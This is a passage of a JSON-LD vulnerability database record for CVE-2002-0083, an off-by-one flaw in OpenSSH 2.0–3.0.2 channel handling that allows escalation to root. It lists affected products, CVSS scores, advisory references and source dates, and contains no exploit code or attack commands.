"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200203-0011",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "redhat",
"version": "7.1"
},
{
"model": "mandrake linux corporate server",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "1.0.1"
},
{
"model": "openssh",
"scope": "lt",
"trust": 1.0,
"vendor": "openbsd",
"version": "3.1"
},
{
"model": "secure linux",
"scope": "eq",
"trust": 1.0,
"vendor": "trustix",
"version": "1.5"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "5.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "7.0"
},
{
"model": "mandrake single network firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "7.2"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "8.0"
},
{
"model": "secure linux",
"scope": "eq",
"trust": 1.0,
"vendor": "engardelinux",
"version": "1.0.1"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "7.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "6.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "ecommerce"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "graficas"
},
{
"model": "openssh",
"scope": "gte",
"trust": 1.0,
"vendor": "openbsd",
"version": "2.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "7.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7.3"
},
{
"model": "openpkg",
"scope": "eq",
"trust": 1.0,
"vendor": "openpkg",
"version": "1.0"
},
{
"model": "secure linux",
"scope": "eq",
"trust": 1.0,
"vendor": "trustix",
"version": "1.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7.1"
},
{
"model": "immunix",
"scope": "eq",
"trust": 1.0,
"vendor": "immunix",
"version": "7.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "8.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7.0"
},
{
"model": "secure linux",
"scope": "eq",
"trust": 1.0,
"vendor": "trustix",
"version": "1.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "6.4"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "conectiva",
"version": "5.1"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "bsdi",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "caldera",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "conectiva",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "engarde",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mandrakesoft",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix",
"version": null
},
{
"model": "hp-ux",
"scope": null,
"trust": 0.8,
"vendor": "\u30d2\u30e5\u30fc\u30ec\u30c3\u30c8 \u30d1\u30c3\u30ab\u30fc\u30c9",
"version": null
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.0"
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.2"
},
{
"model": "red hat linux",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": "7.1"
},
{
"model": "openssh",
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.9.9"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.9"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.9"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.9"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.5.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.5.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.1.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.1"
},
{
"model": "openbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "openbsd",
"version": "2.8"
},
{
"model": "openssh",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "BID",
"id": "4241"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:graficas:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:immunix:immunix:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openpkg:openpkg:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:ecommerce:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_single_network_firewall:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:conectiva:linux:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.1",
"versionStartIncluding": "2.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:trustix:secure_linux:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.1:*:sparc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:redhat:linux:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.1:alpha:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:redhat:linux:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:1.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.3:*:ppc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.0:*:sparc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:6.4:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.3:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.0:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.0:*:ppc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:8.0:*:ppc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:engardelinux:secure_linux:1.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:6.4:*:ppc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.0:alpha:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:trustix:secure_linux:1.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.1:*:spa:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:6.4:alpha:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.2:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.3:*:sparc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7.1:*:x86:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:redhat:linux:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Joost Pol\u203b joost@pine.nl",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
}
],
"trust": 0.6
},
"cve": "CVE-2002-0083",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2002-0083",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-4478",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2002-0083",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2002-0083",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#408419",
"trust": 0.8,
"value": "25.65"
},
{
"author": "CNNVD",
"id": "CNNVD-200203-034",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-4478",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "VULHUB",
"id": "VHN-4478"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Off-by-one error in the channel code of OpenSSH 2.0 through 3.0.2 allows local users or remote malicious servers to gain privileges. OpenSSH is a program used to provide secure connection and communications between client and servers. Channels are used to segregate differing traffic between the client and the server. OpenSSH is a suite implementing the SSH protocol. It includes client and server software, and supports ssh and sftp. It was initially developed for BSD, but is also widely used for Linux, Solaris, and other UNIX-like operating systems. \nA vulnerability has been announced in some versions of OpenSSH. A malicious client may exploit this vulnerability by connecting to a vulnerable server. Valid credentials are believed to be required, since the exploitable condition reportedly occurs after successful authentication. An examination of the code suggests this, but it has not been confirmed by the maintainer. \nAdministrators should assume that this can be exploited without authentication and should patch vulnerable versions immediately. It encrypts and transmits all network communications, thereby avoiding attacks at many network layers, and is a very useful network connection tool. A user with a legal login account can use this vulnerability to obtain the root authority of the host. To implement X11, TCP and proxy forwarding, OpenSSH multiplexes multiple \"channels\" on a single TCP connection. The program may mistakenly use memory data outside the normal range, and an attacker with a legitimate login account logs in After entering the system, this vulnerability can be exploited to allow sshd to execute arbitrary commands with root privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-0083"
},
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "BID",
"id": "4241"
},
{
"db": "VULHUB",
"id": "VHN-4478"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-4478",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-4478"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-0083",
"trust": 3.6
},
{
"db": "BID",
"id": "4241",
"trust": 3.0
},
{
"db": "CERT/CC",
"id": "VU#408419",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "730",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200203-034",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "21314",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-75148",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-4478",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "VULHUB",
"id": "VHN-4478"
},
{
"db": "BID",
"id": "4241"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"id": "VAR-200203-0011",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-4478"
}
],
"trust": 0.01
},
"last_update_date": "2024-02-26T22:51:43.141000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "043",
"trust": 0.8,
"url": "http://www.openbsd.org/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-193",
"trust": 1.0
},
{
"problemtype": "Determination of boundary conditions (CWE-193) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-189",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-4478"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.openbsd.org/advisories/ssh_channelalloc.txt"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/4241"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=101553908201861\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=101552065005254\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=101561384821761\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=101586991827622\u0026w=2"
},
{
"trust": 1.1,
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-03/0108.html"
},
{
"trust": 1.1,
"url": "http://online.securityfocus.com/archive/1/264657"
},
{
"trust": 1.1,
"url": "http://www.calderasystems.com/support/security/advisories/cssa-2002-012.0.txt"
},
{
"trust": 1.1,
"url": "ftp://stage.caldera.com/pub/security/openserver/cssa-2002-sco.10/cssa-2002-sco.10.txt"
},
{
"trust": 1.1,
"url": "ftp://stage.caldera.com/pub/security/openunix/cssa-2002-sco.11/cssa-2002-sco.11.txt"
},
{
"trust": 1.1,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000467"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2002/dsa-119"
},
{
"trust": 1.1,
"url": "http://www.linuxsecurity.com/advisories/other_advisory-1937.html"
},
{
"trust": 1.1,
"url": "ftp://ftp.freebsd.org/pub/freebsd/cert/advisories/freebsd-sa-02:13.openssh.asc"
},
{
"trust": 1.1,
"url": "http://online.securityfocus.com/advisories/3960"
},
{
"trust": 1.1,
"url": "http://www.linux-mandrake.com/en/security/2002/mdksa-2002-019.php"
},
{
"trust": 1.1,
"url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2002-004.txt.asc"
},
{
"trust": 1.1,
"url": "http://www.osvdb.org/730"
},
{
"trust": 1.1,
"url": "http://www.redhat.com/support/errata/rhsa-2002-043.html"
},
{
"trust": 1.1,
"url": "http://www.novell.com/linux/security/advisories/2002_009_openssh_txt.html"
},
{
"trust": 1.1,
"url": "http://archives.neohapsis.com/archives/vulnwatch/2002-q1/0060.html"
},
{
"trust": 1.1,
"url": "http://www.iss.net/security_center/static/8383.php"
},
{
"trust": 0.8,
"url": "http://www.pine.nl/advisories/pine-cert-20020301.txt"
},
{
"trust": 0.8,
"url": "http://online.securityfocus.com/bid/4241"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2002-0083"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/408419"
},
{
"trust": 0.3,
"url": "http://support.coresecurity.com/impact/exploits/44711fd6971e717073942524961d8e3e.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "VULHUB",
"id": "VHN-4478"
},
{
"db": "BID",
"id": "4241"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#408419"
},
{
"db": "VULHUB",
"id": "VHN-4478"
},
{
"db": "BID",
"id": "4241"
},
{
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-03-07T00:00:00",
"db": "CERT/CC",
"id": "VU#408419"
},
{
"date": "2002-03-15T00:00:00",
"db": "VULHUB",
"id": "VHN-4478"
},
{
"date": "2002-03-07T00:00:00",
"db": "BID",
"id": "4241"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"date": "2002-03-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"date": "2002-03-15T05:00:00",
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-04-02T00:00:00",
"db": "CERT/CC",
"id": "VU#408419"
},
{
"date": "2016-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-4478"
},
{
"date": "2007-11-05T15:25:00",
"db": "BID",
"id": "4241"
},
{
"date": "2024-02-26T07:51:00",
"db": "JVNDB",
"id": "JVNDB-2002-000054"
},
{
"date": "2006-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200203-034"
},
{
"date": "2024-02-02T02:52:51.803000",
"db": "NVD",
"id": "CVE-2002-0083"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200203-034"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains a one-off overflow of an array in the channel handling code",
"sources": [
{
"db": "CERT/CC",
"id": "VU#408419"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "digital error",
"sources": [
{
